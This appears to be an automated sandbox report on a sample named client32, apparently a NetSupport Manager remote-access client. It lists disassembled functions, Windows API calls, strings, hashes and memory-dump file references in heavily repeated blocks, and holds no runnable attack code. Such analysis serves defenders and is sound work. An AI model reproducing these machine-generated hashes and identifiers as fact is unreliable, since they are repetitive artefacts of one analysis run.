                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: FlashWindowEx
                                                                                                • API String ID: 199729137-2859592226
                                                                                                • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                                • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                                Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 110010A6
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 2046328329-2830328467
                                                                                                • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11001066
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 819365019-2830328467
                                                                                                • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostMessageA.USER32 ref: 11001113
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 110010F6
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 906220102-2830328467
                                                                                                • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                • m_hWnd, xrefs: 110151B6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                • API String ID: 819365019-3966830984
                                                                                                • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                                Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                • m_hWnd, xrefs: 11017206
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                • API String ID: 819365019-3966830984
                                                                                                • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                                Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11001136
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 1604732272-2830328467
                                                                                                • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                                • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                                Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KillTimer.USER32 ref: 1100102B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11001016
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 2229609774-2830328467
                                                                                                • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                                • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                                Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                                • LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D5F8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoadVersion
                                                                                                • String ID: AudioCapture.dll
                                                                                                • API String ID: 3209957514-2642820777
                                                                                                • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                                • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                                Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110155A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateFileHandle
                                                                                                • String ID: \\.\NSWFPDrv
                                                                                                • API String ID: 3498533004-85019792
                                                                                                • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                Function 69CFBB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
